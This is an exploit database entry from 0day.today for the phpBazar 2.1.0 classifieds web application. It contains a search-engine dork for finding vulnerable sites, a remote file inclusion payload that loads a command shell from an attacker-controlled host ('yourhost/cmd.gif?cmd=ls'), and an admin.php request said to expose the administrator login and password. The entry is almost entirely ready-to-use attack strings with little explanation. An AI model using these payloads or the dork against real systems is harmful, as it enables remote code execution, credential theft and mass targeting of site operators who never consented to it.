phpBazar <= 2.1.0 Remote (Include/Auth Bypass) Vulnerabilities

2006-05-19T00:00:00
ID 1337DAY-ID-428
Type zdt
Reporter [Oo]
Modified 2006-05-19T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==============================================================
phpBazar <= 2.1.0 Remote (Include/Auth Bypass) Vulnerabilities
==============================================================



Title: phpBazar <= 2.1.0 Multiple vulnerabilites
URL: http://www.smartisoft.com/
Dork: inurl:classified.php phpbazar

Exploits:
-remote file inclusion: /classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls
-access to admin login and password: /admin/admin.php?action=edit_member&value=1




#  0day.today [2018-04-02]  #